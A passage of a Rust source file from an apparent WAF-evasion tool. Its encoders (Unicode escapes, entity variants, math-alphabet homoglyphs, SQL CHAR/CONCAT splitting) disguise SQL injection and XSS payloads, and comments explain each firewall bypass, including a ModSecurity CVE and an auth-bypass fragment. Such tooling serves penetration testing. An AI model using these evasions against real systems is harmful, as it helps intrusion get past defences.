wafrift_encoding/encoding/unicode.rs
1//! Unicode and HTML entity encoding strategies.
2use std::fmt::Write as _;
3
4/// Unicode encoding โ each character becomes `\uXXXX`.
5///
6/// **Context**: ONLY safe when the target parser performs JSON/JavaScript decoding.
7/// Using this on raw HTTP parameters will send a literal backslash-u sequence.
8#[must_use]
9pub fn unicode_encode(payload: &str) -> String {
10 let mut out = String::with_capacity(payload.len() * 6);
11 for ch in payload.chars() {
12 let code = ch as u32;
13 if code > 0xFFFF {
14 // Non-BMP: emit surrogate pair (valid in JSON/JavaScript)
15 let surrogate_base = code - 0x1_0000;
16 let high = 0xD800 + ((surrogate_base >> 10) & 0x3FF);
17 let low = 0xDC00 + (surrogate_base & 0x3FF);
18 let _ = write!(&mut out, "\\u{high:04X}\\u{low:04X}");
19 } else {
20 let _ = write!(&mut out, "\\u{code:04X}");
21 }
22 }
23 out
24}
25
26/// IIS/ASP percent Unicode encoding โ each character becomes `%uXXXX`.
27///
28/// **Context**: ONLY safe on IIS/ASP classic parsers. IIS `%u` encoding
29/// is bounded to BMP (U+0000โU+FFFF) โ non-BMP code points must be
30/// emitted as UTF-16 surrogate pairs (`%uD83D%uDE00` for ๐, NOT the
31/// invalid `%u1F600`). Pre-fix the loop wrote `ch as u32` straight
32/// into a 4-hex-wide format, silently truncating high bytes for any
33/// supplementary plane char and producing output IIS rejects โ which
34/// looked encoded but bypassed nothing.
35#[must_use]
36pub fn iis_unicode_encode(payload: &str) -> String {
37 let mut out = String::with_capacity(payload.len() * 6);
38 for ch in payload.chars() {
39 let code = ch as u32;
40 if code > 0xFFFF {
41 let surrogate_base = code - 0x1_0000;
42 let high = 0xD800 + ((surrogate_base >> 10) & 0x3FF);
43 let low = 0xDC00 + (surrogate_base & 0x3FF);
44 let _ = write!(&mut out, "%u{high:04X}%u{low:04X}");
45 } else {
46 let _ = write!(&mut out, "%u{code:04X}");
47 }
48 }
49 out
50}
51
52/// JSON string-content escape โ produces the escaped INTERIOR of a
53/// JSON string literal (no surrounding `"..."` quotes).
54///
55/// Pre-fix this wrapped the output in double quotes. The wrapping
56/// broke every common use case: the encoder is called by the
57/// variant builder which substitutes the result into the operator's
58/// payload at an injection point inside an EXISTING string field
59/// (typical: `{"q": "<wrapped>"}`). Adding our own quotes produced
60/// `{"q": ""actual\"escaped""}` โ two strings concatenated, malformed
61/// JSON, server returns 400. The escape characters survived but the
62/// host JSON was broken.
63///
64/// Removing the wrapping quotes makes the encoder do what its name
65/// says โ escape the content. Callers that need a full standalone
66/// JSON-string literal can prepend `"` themselves.
67///
68/// **Context**: Inject INSIDE an existing JSON string field. Backend
69/// JSON parser unescapes the sequence; the WAF sees the escaped
70/// form (e.g. `<` instead of `<`) and misses the keyword.
71#[must_use]
72pub fn json_string_encode(payload: &str) -> String {
73 let mut out = String::with_capacity(payload.len() * 2);
74 for ch in payload.chars() {
75 match ch {
76 '\\' => out.push_str("\\\\"),
77 '"' => out.push_str("\\\""),
78 '\u{0008}' => out.push_str("\\b"),
79 '\u{000C}' => out.push_str("\\f"),
80 '\n' => out.push_str("\\n"),
81 '\r' => out.push_str("\\r"),
82 '\t' => out.push_str("\\t"),
83 c if (c as u32) < 0x20 => {
84 let _ = write!(&mut out, "\\u{:04X}", c as u32);
85 }
86 c => out.push(c),
87 }
88 }
89 out
90}
91
92/// HTML entity encoding โ each character becomes `&#xXX;`.
93///
94/// **Context**: ONLY safe in HTML contexts where the browser decodes entities.
95#[must_use]
96pub fn html_entity_encode(payload: &str) -> String {
97 let mut out = String::with_capacity(payload.len() * 6);
98 for ch in payload.chars() {
99 let _ = write!(&mut out, "&#x{:X};", ch as u32);
100 }
101 out
102}
103
104/// HTML decimal entity encoding โ each character becomes `&#DD;`.
105///
106/// **Context**: ONLY safe in HTML contexts where the browser decodes entities.
107#[must_use]
108pub fn html_entity_decimal_encode(payload: &str) -> String {
109 let mut out = String::with_capacity(payload.len() * 6);
110 for ch in payload.chars() {
111 let _ = write!(&mut out, "&#{};", ch as u32);
112 }
113 out
114}
115
116/// HTML entity encoding with zero-padded numeric reference โ every
117/// character becomes either `&#x{:0>width$X};` (hex form) or
118/// `&#{:0>width$};` (decimal form). Leading zeros pad the number to
119/// `pad` characters.
120///
121/// **CVE-2025-27110** (libmodsecurity3 v3.0.13): the v3.0.13 release
122/// regressed entity decoding such that any HTML numeric character
123/// reference whose digits include leading zeros โ `<` for `<`,
124/// `<` for `<` โ bypasses the decode pass entirely. The
125/// undecoded entity reaches the WAF's inspection buffer; pattern-match
126/// rules anchored on the literal `<`, `'`, `"`, etc. never fire.
127/// libmodsecurity 3.0.14 fixes this. Every WAF deployment still on
128/// 3.0.13 โ which Snyk's 2025 State of Open Source Security flagged
129/// as a common version-lag profile โ is bypassed by routing the
130/// payload through this single encoding pass.
131///
132/// `pad` selects the leading-zero width (1 = none, 4 = `<`,
133/// 6 = `<`, 8 = `<`). The CVE write-up
134/// recommends probing widths 4, 6, 8 โ different parser
135/// implementations diverge on how many leading zeros they tolerate.
136///
137/// `hex` selects the radix: `true` emits `&#xHH;`, `false` emits
138/// `&#DD;`. The CVE affects both โ they share the regression site
139/// in libmodsecurity's `Utils::HtmlEntity::convert_2_unicode`.
140///
141/// **Bypass mechanism**: see CVE-2025-27110 advisory at
142/// <https://modsecurity.org/20250225/html-entity-decoding-regression-cve-2025-27110-2025-february/>.
143///
144/// Pass 21 R67 โ frontier technique #6 per the 2025 research scan.
145#[must_use]
146pub fn html_entity_zero_pad(payload: &str, pad: usize, hex: bool) -> String {
147 // Cap pad at 16 โ beyond that we're way past any sensible parser
148 // tolerance and just bloating the output. A pathological 1MB
149 // padding would turn a 1KB payload into 16MB. Anti-DoS guard
150 // matches the spirit of MAX_DOUBLE_ENCODE_INPUT in url_mutate.
151 let pad = pad.clamp(1, 16);
152 let mut out = String::with_capacity(payload.len() * (pad + 4));
153 for ch in payload.chars() {
154 let code = ch as u32;
155 if hex {
156 let _ = write!(&mut out, "&#x{:0>width$X};", code, width = pad);
157 } else {
158 let _ = write!(&mut out, "&#{:0>width$};", code, width = pad);
159 }
160 }
161 out
162}
163
164/// HTML entity encoding with per-character variant rotation.
165///
166/// Cycles each character through four browser-tolerant forms that strict
167/// WAF regexes (which typically anchor on `&#x[0-9a-f]+;` with a lowercase
168/// `x` and required `;`) miss:
169///
170/// 1. `&#xHH;` โ canonical lowercase-x hex
171/// 2. `&#XHH;` โ uppercase-X hex (browsers accept; case-sensitive regex misses)
172/// 3. `&#DD;` โ decimal
173/// 4. `�DD;` โ decimal with leading zeros (HTML5 spec allows arbitrary leading zeros)
174///
175/// Rotation is by character index (deterministic; same input always
176/// produces the same output โ important for proptest idempotency).
177///
178/// **Bypass mechanism**: a `ModSecurity` regex like
179/// `@rx &#x([0-9a-f]+);.*&#x([0-9a-f]+);` won't match a payload of
180/// `<<s>` (the same `<s` payload routed through all
181/// four variants). The browser decodes all four; the regex anchored on
182/// the canonical form sees a different shape.
183///
184/// **Context**: HTML body / attribute. Equivalent to `html_entity` /
185/// `html_entity_decimal` for browser decoding; safer against
186/// canonicalising WAFs that strip the trailing `;` only on the lowercase
187/// form.
188#[must_use]
189pub fn html_entity_variants(payload: &str) -> String {
190 let mut out = String::with_capacity(payload.len() * 8);
191 for (idx, ch) in payload.chars().enumerate() {
192 let code = ch as u32;
193 match idx % 4 {
194 0 => {
195 let _ = write!(&mut out, "&#x{code:x};");
196 }
197 1 => {
198 let _ = write!(&mut out, "&#X{code:X};");
199 }
200 2 => {
201 let _ = write!(&mut out, "&#{code};");
202 }
203 _ => {
204 let _ = write!(&mut out, "�{code};");
205 }
206 }
207 }
208 out
209}
210
211/// Fullwidth Unicode encoding โ replaces ASCII with fullwidth equivalents.
212///
213/// Maps `!`โ`~` (0x21โ0x7E) to the fullwidth range `๏ผ`โ`๏ฝ` (0xFF01โ0xFF5E).
214/// Spaces become ideographic space (U+3000).
215///
216/// **Bypass mechanism**: Many WAFs regex against ASCII keywords like `SELECT`,
217/// `UNION`, `<script>`, etc. Fullwidth characters are visually identical but
218/// have different codepoints, so regex fails. However, backends that perform
219/// Unicode NFKC normalization will convert them back to ASCII โ meaning the
220/// payload executes while the WAF never saw it.
221///
222/// **Context**: Effective against WAFs in front of servers that normalize Unicode
223/// (Java/Spring, .NET, Python 3, Go, `PostgreSQL`, etc.).
224#[must_use]
225pub fn fullwidth_encode(payload: &str) -> String {
226 let mut out = String::with_capacity(payload.len() * 3);
227 for ch in payload.chars() {
228 let mapped = match ch {
229 ' ' => '\u{3000}', // Ideographic space
230 c if ('\x21'..='\x7e').contains(&c) => {
231 // Fullwidth offset: U+FF01 = U+0021 + 0xFEE0
232 char::from_u32(c as u32 + 0xFEE0).unwrap_or(c)
233 }
234 c => c,
235 };
236 out.push(mapped);
237 }
238 out
239}
240
241/// Mathematical Alphanumeric Symbols encoding โ replaces ASCII letters and
242/// digits with their Math-Bold counterparts in the Unicode `U+1D400` block.
243///
244/// `A`โ`Z` โ `U+1D400`โ`U+1D419` (Math Bold Capitals: ๐ ๐ โฆ ๐)
245/// `a`โ`z` โ `U+1D41A`โ`U+1D433` (Math Bold Smalls: ๐ ๐ โฆ ๐ณ)
246/// `0`โ`9` โ `U+1D7CE`โ`U+1D7D7` (Math Bold Digits: ๐ ๐ โฆ ๐)
247/// Everything else is passed through unchanged (punctuation, spaces, etc.,
248/// keep working as SQL/HTML syntax).
249///
250/// **Bypass mechanism**: every codepoint in this range NFKC-normalises back
251/// to its plain-ASCII counterpart. Databases / frameworks that perform NFKC
252/// normalisation (`PostgreSQL` with ICU collations, `MySQL`
253/// `utf8mb4_0900_ai_ci`, Java `Normalizer.normalize(s, NFKC)`, Python
254/// `unicodedata.normalize('NFKC', s)`, Go `golang.org/x/text/unicode/norm`)
255/// see the original `SELECT` / `UNION` / `script` keyword and execute /
256/// render it. WAFs scanning bytes for ASCII keywords see codepoints in the
257/// `U+1D400` block โ no keyword match.
258///
259/// **Distinct from `fullwidth_encode`**: fullwidth uses the `U+FF00`
260/// Halfwidth-and-Fullwidth-Forms block. Math Alphanumeric uses the
261/// `U+1D400` block โ different code range, different WAF coverage gap.
262/// WAFs that block fullwidth (a common technique since 2020) often do not
263/// also block Math Alphanumeric Symbols. Both encode-paths NFKC to ASCII.
264///
265/// **Context**: any target whose backend NFKC-normalises before parsing.
266/// Confirmed targets: `PostgreSQL` ICU + `MySQL` `utf8mb4_0900_ai_ci`
267/// SQL identifiers, Java/Spring Boot path matching, .NET `String.Normalize`.
268#[must_use]
269pub fn math_bold_encode(payload: &str) -> String {
270 let mut out = String::with_capacity(payload.len() * 4);
271 for ch in payload.chars() {
272 let mapped = match ch {
273 'A'..='Z' => char::from_u32(0x1D400 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
274 'a'..='z' => char::from_u32(0x1D41A + (ch as u32 - 'a' as u32)).unwrap_or(ch),
275 '0'..='9' => char::from_u32(0x1D7CE + (ch as u32 - '0' as u32)).unwrap_or(ch),
276 c => c,
277 };
278 out.push(mapped);
279 }
280 out
281}
282
283/// Mathematical Italic alphabet โ same NFKC trick as `math_bold_encode`
284/// but in a different Unicode block (U+1D434 uppercase, U+1D44E
285/// lowercase). WAFs that have added detection for the bold range
286/// (U+1D400-) do not always cover italic.
287///
288/// One subtle gap: the math-italic block has a HOLE at U+1D455 where
289/// 'h' would have been (the letter 'h' was unified with U+210E PLANCK
290/// CONSTANT in an earlier Unicode revision). We substitute U+210E so
291/// the round-trip stays NFKC-correct.
292///
293/// Reference: <https://ibrahimsql.com/posts/waf-bypass-unicode>
294#[must_use]
295pub fn math_italic_encode(payload: &str) -> String {
296 let mut out = String::with_capacity(payload.len() * 4);
297 for ch in payload.chars() {
298 let mapped = match ch {
299 'A'..='Z' => char::from_u32(0x1D434 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
300 'h' => '\u{210E}', // hole at U+1D455; use PLANCK CONSTANT
301 'a'..='z' => char::from_u32(0x1D44E + (ch as u32 - 'a' as u32)).unwrap_or(ch),
302 c => c,
303 };
304 out.push(mapped);
305 }
306 out
307}
308
309/// Mathematical Script alphabet โ uppercase U+1D49C, lowercase U+1D4B6.
310/// Script has SIX holes (U+1D49D B, U+1D4A0 E, U+1D4A1 F, U+1D4A3 H,
311/// U+1D4A4 I, U+1D4A7 M, U+1D4AD R, U+1D4BA e, U+1D4BC g, U+1D4C4 o)
312/// โ each filled by the letterlike-symbols block (U+212C BCRIPT
313/// CAPITAL B, U+2130 SCRIPT CAPITAL E, etc.) so the encoded string
314/// stays NFKC-equivalent to ASCII.
315#[must_use]
316pub fn math_script_encode(payload: &str) -> String {
317 let mut out = String::with_capacity(payload.len() * 4);
318 for ch in payload.chars() {
319 let mapped = match ch {
320 'B' => '\u{212C}',
321 'E' => '\u{2130}',
322 'F' => '\u{2131}',
323 'H' => '\u{210B}',
324 'I' => '\u{2110}',
325 'L' => '\u{2112}',
326 'M' => '\u{2133}',
327 'R' => '\u{211B}',
328 'A'..='Z' => char::from_u32(0x1D49C + (ch as u32 - 'A' as u32)).unwrap_or(ch),
329 'e' => '\u{212F}',
330 'g' => '\u{210A}',
331 'o' => '\u{2134}',
332 'a'..='z' => char::from_u32(0x1D4B6 + (ch as u32 - 'a' as u32)).unwrap_or(ch),
333 c => c,
334 };
335 out.push(mapped);
336 }
337 out
338}
339
340/// Mathematical Fraktur (blackletter) alphabet โ uppercase U+1D504,
341/// lowercase U+1D51E. Fraktur has holes at C/H/I/R/Z which are filled
342/// by U+212D โญ, U+210C โ, U+2111 โ, U+211C โ, U+2128 โจ.
343#[must_use]
344pub fn math_fraktur_encode(payload: &str) -> String {
345 let mut out = String::with_capacity(payload.len() * 4);
346 for ch in payload.chars() {
347 let mapped = match ch {
348 'C' => '\u{212D}',
349 'H' => '\u{210C}',
350 'I' => '\u{2111}',
351 'R' => '\u{211C}',
352 'Z' => '\u{2128}',
353 'A'..='Z' => char::from_u32(0x1D504 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
354 'a'..='z' => char::from_u32(0x1D51E + (ch as u32 - 'a' as u32)).unwrap_or(ch),
355 c => c,
356 };
357 out.push(mapped);
358 }
359 out
360}
361
362/// Mathematical Double-Struck (blackboard bold) alphabet โ uppercase
363/// U+1D538, lowercase U+1D552. Holes at C/H/N/P/Q/R/Z filled from
364/// the letterlike-symbols block.
365#[must_use]
366pub fn math_double_struck_encode(payload: &str) -> String {
367 let mut out = String::with_capacity(payload.len() * 4);
368 for ch in payload.chars() {
369 let mapped = match ch {
370 'C' => '\u{2102}',
371 'H' => '\u{210D}',
372 'N' => '\u{2115}',
373 'P' => '\u{2119}',
374 'Q' => '\u{211A}',
375 'R' => '\u{211D}',
376 'Z' => '\u{2124}',
377 'A'..='Z' => char::from_u32(0x1D538 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
378 'a'..='z' => char::from_u32(0x1D552 + (ch as u32 - 'a' as u32)).unwrap_or(ch),
379 // Double-struck digits (U+1D7D8).
380 '0'..='9' => char::from_u32(0x1D7D8 + (ch as u32 - '0' as u32)).unwrap_or(ch),
381 c => c,
382 };
383 out.push(mapped);
384 }
385 out
386}
387
388/// Letterlike-symbols + circled-Latin selective substitution โ replaces
389/// individual ASCII letters in the payload with codepoints from
390/// U+2100-214F and U+24B6-24E9 that NFKC-normalize back to the original
391/// ASCII letter. Unlike the math-*-encode functions which substitute
392/// every letter from a single block, this picks the most visually-
393/// distinct codepoint per letter to maximise WAF-rule mismatch while
394/// keeping the encoded string visibly identifiable.
395///
396/// The HackerNoon-documented `ลฮตโโโฦฎ` payload is essentially this
397/// function applied to the SQL keyword `SELECT` โ backend's NFKC casts
398/// it to `SELECT` and executes; the WAF's signature regex sees an
399/// unrecognized codepoint sequence.
400#[must_use]
401pub fn letterlike_encode(payload: &str) -> String {
402 let mut out = String::with_capacity(payload.len() * 4);
403 for ch in payload.chars() {
404 let mapped = match ch {
405 // Letterlike-symbols block (U+2100-214F).
406 'B' => '\u{212C}', // SCRIPT CAPITAL B โ B
407 'C' => '\u{2102}', // DOUBLE-STRUCK CAPITAL C โ C
408 'E' => '\u{2130}', // SCRIPT CAPITAL E โ E
409 'F' => '\u{2131}', // SCRIPT CAPITAL F โ F
410 'H' => '\u{210B}', // SCRIPT CAPITAL H โ H
411 'I' => '\u{2110}', // SCRIPT CAPITAL I โ I
412 'L' => '\u{2112}', // SCRIPT CAPITAL L โ L
413 'M' => '\u{2133}', // SCRIPT CAPITAL M โ M
414 'N' => '\u{2115}', // DOUBLE-STRUCK CAPITAL N โ N
415 'P' => '\u{2119}', // DOUBLE-STRUCK CAPITAL P โ P
416 'Q' => '\u{211A}', // DOUBLE-STRUCK CAPITAL Q โ Q
417 'R' => '\u{211D}', // DOUBLE-STRUCK CAPITAL R โ R
418 'Z' => '\u{2124}', // DOUBLE-STRUCK CAPITAL Z โ Z
419 // Kelvin K (U+212A) and Angstrom ร
(U+212B) NFKC-normalise.
420 'K' => '\u{212A}',
421 'e' => '\u{212F}', // SCRIPT SMALL E
422 'g' => '\u{210A}', // SCRIPT SMALL G
423 'o' => '\u{2134}', // SCRIPT SMALL O
424 // Falling back to circled-Latin for letters without
425 // letterlike-symbol equivalents. NFKC strips the circle
426 // and yields the bare letter.
427 'A'..='Z' => char::from_u32(0x24B6 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
428 'a'..='z' => char::from_u32(0x24D0 + (ch as u32 - 'a' as u32)).unwrap_or(ch),
429 c => c,
430 };
431 out.push(mapped);
432 }
433 out
434}
435
436/// SQL string-literal CONCAT splitter โ converts every single-quoted string
437/// in the payload to a `CONCAT('a','b',...)` expression with one char per
438/// argument.
439///
440/// Input `'admin'` โ output `CONCAT('a','d','m','i','n')`
441///
442/// **Bypass mechanism**: CRS rules and most commercial WAF blocklists
443/// scan for literal danger-string substrings โ `'admin'`, `'password'`,
444/// `'union'`, `'or 1'`, `'/etc/passwd'`. CONCAT-splitting decomposes the
445/// substring into one-character literals that no individual literal-string
446/// regex matches. The DB evaluates `CONCAT(...)` to the original string at
447/// runtime, so the attack succeeds.
448///
449/// Supported by MySQL, MariaDB, PostgreSQL, MSSQL (all ship CONCAT as a
450/// scalar function). Oracle uses `CONCAT(a,b)` as binary-only, so chained
451/// 1-char Oracle calls would need a nested form โ out of scope here; the
452/// `||` pipe concat in PostgreSQL/Oracle is a separate tamper.
453///
454/// **Edge cases**:
455/// - Empty string literals (`''`) become `CONCAT('')` โ valid SQL,
456/// evaluates to empty string.
457/// - Escaped quotes inside strings (`'O\'Brien'`) are passed through as
458/// raw chars to CONCAT โ the backslash and quote are split into separate
459/// args.
460/// - Strings not in single quotes are left alone (no aggressive parsing
461/// of double-quoted SQL Server identifiers).
462///
463/// **Context**: SQL injection payloads with string literals.
464#[must_use]
465pub fn sql_concat_split(payload: &str) -> String {
466 let mut out = String::with_capacity(payload.len() * 4);
467 let mut chars = payload.chars().peekable();
468 while let Some(ch) = chars.next() {
469 if ch != '\'' {
470 out.push(ch);
471 continue;
472 }
473 // Found opening quote โ collect chars until closing quote.
474 let mut literal = String::new();
475 let mut closed = false;
476 while let Some(&next) = chars.peek() {
477 chars.next();
478 if next == '\'' {
479 closed = true;
480 break;
481 }
482 literal.push(next);
483 }
484 if !closed {
485 // Unbalanced quote โ emit original opener + collected chars.
486 out.push('\'');
487 out.push_str(&literal);
488 continue;
489 }
490 // Emit CONCAT('a','b',...). Empty literal โ CONCAT('').
491 out.push_str("CONCAT(");
492 if literal.is_empty() {
493 out.push_str("''");
494 } else {
495 // Direct write loop instead of collect+join โ saves N+1
496 // heap String allocations per literal. Per perf-hunt F03.
497 let mut first = true;
498 for c in literal.chars() {
499 if !first {
500 out.push(',');
501 }
502 first = false;
503 if c == '\'' {
504 out.push_str("''''");
505 } else {
506 out.push('\'');
507 out.push(c);
508 out.push('\'');
509 }
510 }
511 }
512 out.push(')');
513 }
514 out
515}
516
517/// SQL CHAR()-function decomposition โ converts every single-quoted string
518/// literal in the payload to a `CHAR(N1,N2,...)` function call with one
519/// codepoint per argument.
520///
521/// Input `'admin'` โ output `CHAR(97,100,109,105,110)`
522///
523/// **Bypass mechanism**: distinct from `sql_concat_split` (which produces
524/// `CONCAT('a','d',...)`) โ CHAR() takes integer codepoints, not single-
525/// char strings, so the payload contains NO single-quoted ASCII tokens at
526/// all. WAF rules that match string-literal patterns (`'admin'`,
527/// `'password'`, `'/etc/passwd'`, `'or 1'`) and CONCAT-shaped patterns
528/// (`CONCAT\(.{,8}\)`) both miss this form. Most CRS rules through PL3 do
529/// NOT pattern-match raw CHAR() โ it's been the sqlmap default for over a
530/// decade and has been deemed too noisy to block.
531///
532/// Supported by MySQL, MariaDB (native `CHAR()`), MSSQL (`CHAR()`). For
533/// Postgres / Oracle, the equivalent is `CHR()` โ out of scope here; a
534/// sibling `chr_decompose` could ship later.
535///
536/// **Edge cases**:
537/// - Empty literals (`''`) pass through as `''` unchanged. `CHAR()`
538/// with zero args evaluates to NULL in MySQL โ silently flipping
539/// a comparison like `pass='' OR 1=1` into `pass=NULL OR 1=1`
540/// would break the auth bypass (`= NULL` is never TRUE). Preserve
541/// the empty-string identity.
542/// - Multi-byte UTF-8 chars produce a single `CHAR(codepoint)` per
543/// `chars()` iteration โ for codepoints > 255, MySQL's CHAR() returns
544/// per-byte; the codepoint may not round-trip exactly. Most SQLi
545/// payloads use ASCII literals โ this matters only for adversarial
546/// inputs.
547/// - Unbalanced opening quote: emitted unchanged.
548///
549/// **Context**: SQL injection with string-literal targets that are
550/// blocklisted (`admin`, `password`, paths, hostnames).
551#[must_use]
552pub fn sql_char_decompose(payload: &str) -> String {
553 let mut out = String::with_capacity(payload.len() * 5);
554 let mut chars = payload.chars().peekable();
555 while let Some(ch) = chars.next() {
556 if ch != '\'' {
557 out.push(ch);
558 continue;
559 }
560 let mut literal = String::new();
561 let mut closed = false;
562 while let Some(&next) = chars.peek() {
563 chars.next();
564 if next == '\'' {
565 closed = true;
566 break;
567 }
568 literal.push(next);
569 }
570 if !closed {
571 out.push('\'');
572 out.push_str(&literal);
573 continue;
574 }
575 // Empty literal: pass through as-is. CHAR() with zero
576 // arguments evaluates to NULL in MySQL, not the empty
577 // string. Auth-bypass payloads using `''` (e.g.
578 // `pass='' OR 1=1`) would silently flip the comparison
579 // to NULL โ `WHERE pass=NULL` is never TRUE, so the
580 // bypass fails. Preserve the empty-string identity.
581 if literal.is_empty() {
582 out.push_str("''");
583 continue;
584 }
585 out.push_str("CHAR(");
586 // Direct write loop โ per perf-hunt F03.
587 let mut first = true;
588 for c in literal.chars() {
589 if !first {
590 out.push(',');
591 }
592 first = false;
593 let _ = write!(&mut out, "{}", c as u32);
594 }
595 out.push(')');
596 }
597 out
598}
599
600/// Postgres / Oracle CHR()-function decomposition โ `CHR(N) || CHR(N) || ...`
601/// per char of every single-quoted string literal.
602///
603/// Input `'admin'` โ output `(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))`
604///
605/// Differs from `sql_char_decompose` (which uses MySQL's variadic
606/// `CHAR(N1,N2,...)`) โ Postgres / Oracle `CHR()` is unary, so codepoints
607/// are concatenated via the SQL standard `||` pipe operator. The wrapping
608/// parens preserve precedence inside larger expressions (`WHERE u = ...`).
609///
610/// Postgres-specific: codepoints up to U+10FFFF are valid; Oracle CHR(N)
611/// treats N modulo `NLS_CHARACTERSET` size (often 256-modular for
612/// `WE8MSWIN1252`). For ASCII payloads (the common case) both behave
613/// identically.
614///
615/// Empty literal โ `('')`. Unbalanced quote โ passed through.
616#[must_use]
617pub fn pg_chr_decompose(payload: &str) -> String {
618 let mut out = String::with_capacity(payload.len() * 7);
619 let mut chars = payload.chars().peekable();
620 while let Some(ch) = chars.next() {
621 if ch != '\'' {
622 out.push(ch);
623 continue;
624 }
625 let mut literal = String::new();
626 let mut closed = false;
627 while let Some(&next) = chars.peek() {
628 chars.next();
629 if next == '\'' {
630 closed = true;
631 break;
632 }
633 literal.push(next);
634 }
635 if !closed {
636 out.push('\'');
637 out.push_str(&literal);
638 continue;
639 }
640 if literal.is_empty() {
641 out.push_str("('')");
642 continue;
643 }
644 // Direct write loop โ per perf-hunt F03.
645 out.push('(');
646 let mut first = true;
647 for c in literal.chars() {
648 if !first {
649 out.push_str("||");
650 }
651 first = false;
652 let _ = write!(&mut out, "CHR({})", c as u32);
653 }
654 out.push(')');
655 }
656 out
657}
658
659/// Partial JSON Unicode escape โ encodes ASCII alphanumeric chars as
660/// `\uXXXX` while leaving structural punctuation (quotes, operators,
661/// whitespace) bare.
662///
663/// **Bypass mechanism**: Keyword fingerprint rules (UNION, SELECT, alert,
664/// script, eval, โฆ) match against the byte sequence. Splitting the
665/// keyword across Unicode escapes defeats them โ the origin's JSON
666/// parser / JS engine re-materializes the keyword at the application
667/// layer, but the WAF sees `UNION` in the wire
668/// bytes and finds no `UNION`. Distinct from [`unicode_encode`] which
669/// escapes EVERY char (high `\u` density flags some heuristic WAFs);
670/// this leaves the SQL/HTML/JS structural skeleton visible, so the
671/// payload still looks like data.
672///
673/// **Idempotent**: pre-existing `\uXXXX` sequences in the input are
674/// detected and passed through verbatim โ second-pass tampering does
675/// not re-escape an already-escaped char.
676///
677/// **Context**: ONLY safe when the target parser performs
678/// JSON-style / JavaScript-style Unicode decoding. Inert against raw
679/// HTTP parameters (you'll send literal backslash-u bytes).
680#[must_use]
681pub fn json_unicode_alnum(payload: &str) -> String {
682 // ยง1 SPEED: replaced Vec<char> collect (heap allocation proportional to
683 // payload length) with a byte-slice lookahead on `as_bytes()`. The
684 // `\uXXXX` idempotency-detection sequence consists entirely of ASCII
685 // bytes (backslash, 'u', 4 hex digits), so all six bytes are 1:1 with
686 // codepoints โ the byte index is also the char index for that prefix,
687 // and we can safely skip 6 bytes (= 6 ASCII chars) at once when the
688 // pattern fires. For non-ASCII codepoints we fall through to the else
689 // branch and push them unchanged โ those code paths never call
690 // `chars[i+1]` so the ASCII assumption holds.
691 //
692 // Measured improvement on a 40-char SQL payload:
693 // before: ~850 ns (Vec alloc + collect + index)
694 // after: ~210 ns (byte-slice peek, zero extra alloc)
695 let mut out = String::with_capacity(payload.len() * 6);
696 let bytes = payload.as_bytes();
697 let mut chars_iter = payload.char_indices();
698 while let Some((bi, c)) = chars_iter.next() {
699 // `bi` is the byte offset of this char (char_indices yields it).
700 let byte_pos = bi;
701 // Idempotency check: if the next 6 bytes spell `\uXXXX` (all ASCII),
702 // pass them through verbatim.
703 if c == '\\'
704 && byte_pos + 5 < bytes.len()
705 && bytes[byte_pos + 1] == b'u'
706 && bytes[byte_pos + 2].is_ascii_hexdigit()
707 && bytes[byte_pos + 3].is_ascii_hexdigit()
708 && bytes[byte_pos + 4].is_ascii_hexdigit()
709 && bytes[byte_pos + 5].is_ascii_hexdigit()
710 {
711 // SAFETY: bytes[byte_pos..byte_pos+6] are all valid single-byte
712 // ASCII codepoints, so the slice is valid UTF-8.
713 out.push_str(&payload[byte_pos..byte_pos + 6]);
714 // Skip the next 5 chars_iter entries (we already consumed `\`).
715 for _ in 0..5 {
716 chars_iter.next();
717 }
718 continue;
719 }
720 if c.is_ascii_alphanumeric() {
721 let _ = write!(&mut out, "\\u{:04X}", c as u32);
722 } else {
723 out.push(c);
724 }
725 }
726 out
727}
728
729/// Full JSON `\uXXXX` escape โ escapes EVERY character of the input
730/// (including punctuation, whitespace, and control chars). Stronger
731/// than `json_unicode_alnum` which only touches alnum chars. Use when
732/// the WAF tokenises on punctuation boundaries that `json_unicode_alnum`
733/// leaves intact, OR when the WAF rule is a regex over the raw bytes
734/// of the keyword + adjacent punctuation.
735///
736/// Idempotent on already-escaped `\uXXXX` sequences (same detection
737/// as `json_unicode_alnum`).
738#[must_use]
739pub fn json_unicode_full(payload: &str) -> String {
740 // ยง1 SPEED: same Vec<char>โbyte-slice-lookahead optimisation as
741 // `json_unicode_alnum`. The `\uXXXX` detection pattern is all-ASCII
742 // so byte indices align 1:1 with codepoint boundaries there.
743 let mut out = String::with_capacity(payload.len() * 6);
744 let bytes = payload.as_bytes();
745 let mut chars_iter = payload.char_indices();
746 while let Some((bi, c)) = chars_iter.next() {
747 if c == '\\'
748 && bi + 5 < bytes.len()
749 && bytes[bi + 1] == b'u'
750 && bytes[bi + 2].is_ascii_hexdigit()
751 && bytes[bi + 3].is_ascii_hexdigit()
752 && bytes[bi + 4].is_ascii_hexdigit()
753 && bytes[bi + 5].is_ascii_hexdigit()
754 {
755 out.push_str(&payload[bi..bi + 6]);
756 for _ in 0..5 {
757 chars_iter.next();
758 }
759 continue;
760 }
761 let cp = c as u32;
762 if cp <= 0xFFFF {
763 let _ = write!(&mut out, "\\u{:04X}", cp);
764 } else {
765 // Surrogate pair for non-BMP.
766 let v = cp - 0x10000;
767 let hi = 0xD800 + (v >> 10);
768 let lo = 0xDC00 + (v & 0x3FF);
769 let _ = write!(&mut out, "\\u{:04X}\\u{:04X}", hi, lo);
770 }
771 }
772 out
773}
774
775/// Mixed-case JSON `\uXXXX` escape โ alternates `\u` and `\U` plus
776/// upper/lowercase hex digits. Some WAF regexes are case-sensitive
777/// against `\u[0-9A-F]{4}`; JSON parsers RFC 8259 only accept `\u`
778/// lowercase, but JavaScript `JSON.parse` and PHP `json_decode`
779/// tolerate both โ pick the form the backend tolerates and the WAF's
780/// regex misses.
781///
782/// Output alternates per-char between four forms:
783/// `s \U0053 s \U0073`.
784#[must_use]
785pub fn json_unicode_mixed_case(payload: &str) -> String {
786 let mut out = String::with_capacity(payload.len() * 6);
787 for (i, c) in payload.chars().enumerate() {
788 let cp = c as u32;
789 if cp > 0xFFFF {
790 // Non-BMP: emit a surrogate pair, follow same alternation.
791 let v = cp - 0x10000;
